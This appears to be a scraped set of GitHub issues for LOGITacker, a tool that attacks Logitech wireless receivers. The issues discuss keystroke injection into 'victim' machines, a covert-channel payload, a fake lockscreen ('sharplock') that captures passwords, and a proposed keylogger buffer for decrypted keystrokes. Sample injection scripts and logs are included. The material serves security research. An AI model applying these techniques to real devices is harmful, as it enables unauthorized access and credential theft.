hi, i just try new version and after flash and restart the device, he don`t appear in device list...
But when i put old version, all is ok...
what can be wrong?
how to troubleshoot this? :)
tnx.
Minor error in 'option discover onhit' help text
Help text for passive-enum shoud read "enter passive enumeration mode", and not "enter active enumeration mode"
LOGITacker (discover) $ options discover onhit
onhit - select action to take when device a RF address is discovered
Options:
-h, --help :Show command help.
Subcommands:
continue :stay in discover mode.
active-enum :enter active enumeration mode
passive-enum :enter active enumeration mode
auto-inject :enter injection mode and execute injection
I am missing the h file when compiling
#include "crc16.h"
#include "app_util_platform.h"
My nRF52840 no longer wants to store any settings/scripts.
I have tried the last 3 firmwares releases and I encounter the same problem each time:
LOGITacker (discover) $ options store
<warning> LOGITACKER_OPTIONS: failed to find Flash Data Storage record for global options: 2
<error> LOGITACKER_OPTIONS: failed to write global options to Flash Data Storage
<info> LOGITACKER_OPTIONS: global options stored to Flash Data Storage
LOGITacker (discover) $ script store test
<error> LOGITACKER_SCRIPT_ENGINE: failed to write first task for script storage
<info> app: Storing script failed
Do you have any suggestions on what the problem could be?
Thanks
John
Hello,
I am very new to this kind of playing so please be polite.
i would like to share my devices-list, where injection was successfull:
Logitech M525, Unify Receiver CU0007 - FW 012.001.00019
Logitech M185, Receiver CU0010 - FW 029.001.00016
let me know which devices works for you.
thanks
James
Hi Mame82,
I cannot find anything for my issue, so I ask you if you have some info. My dongle doesn’t seem to work. I’ve tested on Linux and Windows and nothing appear on USB debug.
I tried your steps to flash Logitacker inside it and cannot have the USB storage for the firmware inside. I tried multiple time plug it with the button pushed or double push before plugin and nothing append.
Do you think my device is bricked?
Sorry for the inconvenience.
Thank you,
Is there a different instruction set for U0008 and U0012? I only have 1 0007 and I cant seem to get 0008 to work. The script get transmitted but nothing executes on my victim end. The receiver is out of box version.
Is there a way to flash the vulnerable firmware into the receiver?
Is it available to sniff raw nrf24 frames for unknown devices without changing code of toolkit? Or can you add it to TODO list?
hi mame :)
with new version i have issue to execute inject...
LOGITacker (injection) $ script load calc_win10
<info> LOGITACKER_SCRIPT_ENGINE: script calc_win10 file_id 1004
<error> LOGITACKER_SCRIPT_ENGINE: logitacker_script_engine_load_script_from_flas h: failed to read task data
<info> app: loading script failed
LOGITacker (injection) $ inject target F3:F4:95:87:08
inject target F3:F4:95:87:08
Trying to send keystrokes using address F3:F4:95:87:08
<info> app: parsed addr len 5:
<info> app: F3 F4 95 87 08 |.....
<info> LOGITACKER_PROCESSOR_INJECT: Stop injection mode for address F3:F4:95:87:08
<info> LOGITACKER_RADIO: Channel hopping stopped
<info> LOGITACKER_PROCESSOR_INJECT: Initializing injection mode for F3:F4:95:87:08
<info> LOGITACKER_RADIO: Channel hopping stopped
<info> ESB_ILLEGALMOD: Using channel table 'Unifying'
<info> ESB_ILLEGALMOD: New channel table with length 25
LOGITacker (injection) $ inject execute
<info> LOGITACKER_PROCESSOR_INJECT: No more tasks scheduled
<info> LOGITACKER_PROCESSOR_INJECT: script execution succeeded
<info> LOGITACKER: Injection processing resumed
but nothing happening...
Hello,
as i read the documents, for unpair all you need access to the victims receiver, is that correct?
how does the scenario looks like, when you have no access to the receiver to unpair?
which commands are needed then?
best regards
James
Hey, another thought that might improve things in a noisy environment, maybe its worth implementing. I have honestly no idea for the different supported hardware how much memory is available but might be worth thinking about it.
The idea is to have a ringbuffer of a couple of bytes/keystrokes/mouse movements associated with each device (especially for there being a few unencrypted around here still), maybe configurable at compile/run time? When listing the devices this could then display those, which is a bit nicer in display than the single keycodes in the logs as well as a bit better for many devices than passing it through to the host.
Hi,
Can't wait to play with this ! I will wait for tommorow to detach the pcb from the dongle and solder it to my USB connector from adafruit that was laying around, but while looking at the source code i saw that only US and DE were present, so i'd like to take care of adding support for french (azerty) keyboard since you must have a lot of work already and i'd hate to add more :)
I just want to be sure to do the right thing before i start so i don't spend time on it for nothing, i was planning on using this file as reference :
to modify this one (starting at line 275) :
https://raw.githubusercontent.com/mame82/LOGITacker/master/logitacker/logitacker_keyboard_map.h
but maybe i've got it all wrong and this is not the way to do it.. in which case i'll just leave this here and hope it can be implemented in the future :)
The README states:
To program the dongle follow these steps:
disconnect the dongle from the host
double-click button on the dongle (through the tiny hole)
copy logitacker_apr-dongle.uf2 to the removable drive 'NRF52BOOT'
The actual process was:
To program the dongle follow these steps:
disconnect the dongle from the host
hold the button on the dongle (through the tiny hole) while plugging into the host
copy logitacker_apr-dongle.uf2 to the removable drive 'NRF52BOOT'
This binary does not appear to be working with the April Brother dongle as the v0.1.3 did.
Steps to reproduce:
The dongle has been tested successfully with the v0.1.3 build afterwards.
Hi,
While I understand LOGITacker to be a sniffer tool, I was wondering if the expertise here can be re-purposed to create a logitech unifying compatible keyboard using the NRF24 via a Arduino/ESP8266/32.
I need info on the unifying RF protocol, especially on pairing and transmission of data. So far, I have some success with https://github.com/ronangaillard/logitech-mouse. Do also let me know if there is a better place to discuss this.
Thank you.
"connnect" < 3 x "n" in:
https://github.com/RoganDawes/LOGITacker/blame/a5e63823436ccfcfade2c9cd4c00532259218f83/logitacker/logitacker_cli.c#L1460
Is it a typo or another easter egg? :D
It would be nice to have support for mouse injections (in my case only movement is necessary, but it would probably be nice for completeness to be able to click arbitrary buttons too).
Hello, I have plans on getting into this project, as i think it is rather nifty. My question is, would it be possible to write firmware that can then be programmed into the receiver for the express purpose of connecting to LOGITacker? I like the idea of P4wnP1, espically the complexity of the scripts, but a RPi 0 is pretty noticeable :). Or, could it be possible to make LOGITacker program scripts into the receiver, and autorun the scripts upon being plugged in? Sorry if this is exactly what it does, Im still very new to this project.
When running the !sharplock
command on a Windows 10 victim machine, the fake login "Form1" window is displayed in front of all other windows, however the last focused window remains in focus and receives the user's password as input.
Tapping the window or pressing Alt+Tab will give it focus.
Furthermore, without LIGHTSPEED, the transmission of the !sharplock
shellcode takes roughly two minutes, as measured by the console traffic on the LOGITacker console. However, the fake lockscreen already appears on the victim screen after one minute, so I assume the first minute is the actual transmission of the payload, and the second minute is merely the echo from the covert channel console. If there is an easy way to suppress the echo during payload transmission, that could reduce the time to 50%! :)
Thanks for the awesome work, BTW!
Which version of SDK did you build?
I'm trying use the pair feature, but the command seems broken:
LOGITacker (sniff pairing) $ pair device
pair: unknown parameter: device
I can actually see the device over the CLI interface:
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr XX:XX:XX:XX:XX, len: 15, ch idx 1, raw ch 8, rssi 43)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr XX:XX:XX:XX:XX, len: 15, ch idx 1, raw ch 8, rssi 43)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
I'm now getting into the code to see if I can figure this out.
I have tried saving some long scripts, just over 300 lines, and it doesn't work. The Brother dongle reboots when I try to execute "script store script_name"
You can visit my repos if you want to see what I am trying.
I deployed the covert channel on a CU-12 and it works very well. But if the targeted dongle is not with the LIGHTSPEED firmware (e.g: original C-U0012 not flashed), It takes a few minutes to deploy the covert channel (a few seconds for the powershell terminal then a few minutes for the rest of the hidden code).
During these few minutes, if the targeted user clicks with his mouse on a text zone, the entire payload will not be transmitted to the powershell terminal and the covert channel will not work.
To avoid this and increase the chances of success, would it be possible to force the mouse pointer in a corner of the screen (example: upper right corner)?
Upper case Y and Z swapped, test others
Hello it's me again,
I've managed to inject commands on Windows machines and it works like a charm.
Then I tried to inject on Linux but nothing happens. I get the feedback from the command line which informs me that the commands are sent, but on the Linux victim machine nothing happens.
Any idea why ?
I've tried on a Kali 2018 and 2019 image, but I don't think this really matters...
Also my payload is something like:
press GUI
delay 500
string terminal
press ENTER
delay 500
but again I think this depends neither on this.
It's very hard for me to find CU007 OR CU0012 dongles are there any other dongle that has this same vulnerability in LOGITacker?
Like for example CU0008 Is very common does that dongle also has the same vulnerability?
I believe it would be fairly simple to change the code for coveetchannel payloads (sharplocker atm is ‘hardcoded’.
Since the payload is executed by a simple powershell base64 encoded string, we could change the function to add options for loading/storing the base64 string, similar to when devices are added/stored.
Practically, that would make LOGITacker an advanced Rubberducky.
I will look into that, if no one do before me ;)
I have successfully deployed covert_channel to my device and when I issue command :
covert_channel connect xx:xx:xx:xx:xx I get the following returned:
please specify a subcommand.
Am using latest 0.2.3-beta on April Brother dongle.
Any ideas what subcommand should be used?
It would be nice to have a command or ability that tells us the revision of the firmware installed. This will be especially useful to those who aren't compiling/installing from source
It would be nice to see the active devices signal strength when looking as devices. That way it's easier to target devices that are still actively in range.
nRF crashes after few seconds of traffic decoding. With raw pass-through enabled. It seems like it can't keep up with the keyboard. But then again it has no problem when pass through is disabled. I've tried halting the logs and closing the terminal. But the result is always the same, it reboots.
Steps leading to the bug:
Device: nRF52840-Dongle
Firmware: v0.1.2-beta
Keyboard: Logitech K350
Hi,
as the title says, pairing a cu0007 dongle flashed with the G700 firmware doesn't work with the April Brother. I didn't know where to put this issue, in the munifying repo or here, so if this is the wrong place please just inform me and I will create the issue in the other repo as well.
LOGITacker Version: 0.2.1
munifying Version: current git status
Log:
./munifying info
Found CU0007 Dongle for G700/G700s mouse
Using dongle USB config: Configuration 1
Resetting dongle in order to release it from kernel (connected devices won't be usable)
EP descr: ep #1 IN (address 0x81) interrupt - undefined usage [8 bytes]
EP descr: ep #2 IN (address 0x82) interrupt - undefined usage [20 bytes]
HID++ interface: vid=046d,pid=c531,bus=2,addr=5,config=1,if=1,alt=0
HID++ interface IN endpoint: ep #2 IN (address 0x82) interrupt - undefined usage [20 bytes]
Dongle InfoFirmware (maj.minor.build): RQR21.00.B0007
Bootloader (maj.minor): 02.14
WPID: 8006
(likely) protocol: 0x07
Serial: a2:18:9e:70
Connected devices: 0Closing Logitech receiver in Firmware mode (not bootloader)...
./munifying pair
Found CU0007 Dongle for G700/G700s mouse
Using dongle USB config: Configuration 1
Resetting dongle in order to release it from kernel (connected devices won't be usable)
EP descr: ep #1 IN (address 0x81) interrupt - undefined usage [8 bytes]
EP descr: ep #2 IN (address 0x82) interrupt - undefined usage [20 bytes]
HID++ interface: vid=046d,pid=c531,bus=2,addr=5,config=1,if=1,alt=0
HID++ interface IN endpoint: ep #2 IN (address 0x82) interrupt - undefined usage [20 bytes]
Enable pairing for 60 seconds
USB Report type: HID++ short message, DeviceID: 0xff, SubID: SET REGISTER SHORT, Params: 0xb2 0x00 0x00 0x00
Register address: REGISTER PAIRING
Value: 0x00 0x00 0x00
... Enable pairing response (should be enabled)Printing follow up reports ...
LOGITacker (discover) $ pair device run
Trying to pair using Unifying global pairing address
LOGITACKER_RADIO: Channel hopping stopped
LOGITACKER_PROCESSOR_PAIR_DEVICE: Try to pair new device on target address BB:0A:DC:A5:75
LOGITACKER_RADIO: Channel hopping stopped
ESB_ILLEGALMOD: Using channel table 'Unifying pairing'
ESB_ILLEGALMOD: New channel table with length 11
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 0
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 1
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 5F 01 DE AD BE EF 82|._......
LOGITACKER_PROCESSOR_PAIR_DEVICE: 08 13 37 04 00 01 05 0 |......
LOGITACKER_PROCESSOR_PAIR_DEVICE: 00 00 00 00 00 A9 |......
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
LOGITACKER_PROCESSOR_PAIR_DEVICE: Phase before RX: 1
LOGITACKER_PROCESSOR_PAIR_DEVICE: |
LOGITACKER_PROCESSOR_PAIR_DEVICE: RX phase after parsing: 2
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 2
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 40 01 DE 00 |.@...
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
LOGITACKER_PROCESSOR_PAIR_DEVICE: Phase before RX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: |
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: update TX payload called for unknown pairing phase: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 40 01 DE 00 |.@...
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
LOGITACKER_PROCESSOR_PAIR_DEVICE: Phase before RX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: |
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: update TX payload called for unknown pairing phase: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 40 01 DE 00 |.@...
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
LOGITACKER_PROCESSOR_PAIR_DEVICE: Phase before RX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: |
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: update TX payload called for unknown pairing phase: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 40 01 DE 00 |.@...
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
After executing "pair device run" nothing happens in the muifying pairing process ("Printing follow up reports ..."). I tried this procedure in standard workmode and in g700 workmode and with different OS-setups:
When in passive_enum mode, it would be great to have a small in-RAM buffer (maybe something like 1k?) containing the human-readable sequence of sniffed and decrypted keys, that can be displayed over tty with a command like keylog
, and produce something like this output:
> keylog
google.com[RETURN]usr[BACKSPACE]er[TAB]sEcReT[RETURN]
It should be possible to use the existing language layout to do the reverse mapping, right? :)
hello,
i use this script to inject:
LOGITacker (discover) $ script press NUMLOCK
LOGITacker (discover) $ script press GUI R
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script altstring "notepad.exe"
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script press RETURN
LOGITacker (discover) $ script altstring "here comes some demo text. Very much characters. At least 24!"
what happens:
the first run works fine, the second run, whichout any changes, fails.
any ideas what could be wrong?
thanks in advance
James
stupid question, but I want to determine which dongle I'm probably attacking, so it would be nice to know, how the RSSI value can be deciphered?
A higher number should be a nearer target, but which value is for instance the max value and which one the lowest possible?
aliases add: devices storage load (IMPLANT-DEVICE-ADDRESS)
aliases add: script load (TARGET-STORED-SCRIPT)
aliases add: inject target (IMPLANT-DEVICE-ADDRESS)
aliases add: inject execute
aliases store: macattack
Notes:
*Aliases always are loaded on startup.
**Aliases cannot be named after a protected LOGITacker command.
***Aliases accept all related LOGITacker commands/actions
tested it couple times it's awesome but there's little problem with profile image. only got it retrieve like 1/5 times some times even less. am i only one with the issue?
Does this current work using a CrazyRadio PA dongle like mousejack? It has an nRF24LU1+ chip. Mousejack is pretty cool and all, but your software here looks to go more in depth and do more stuff.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.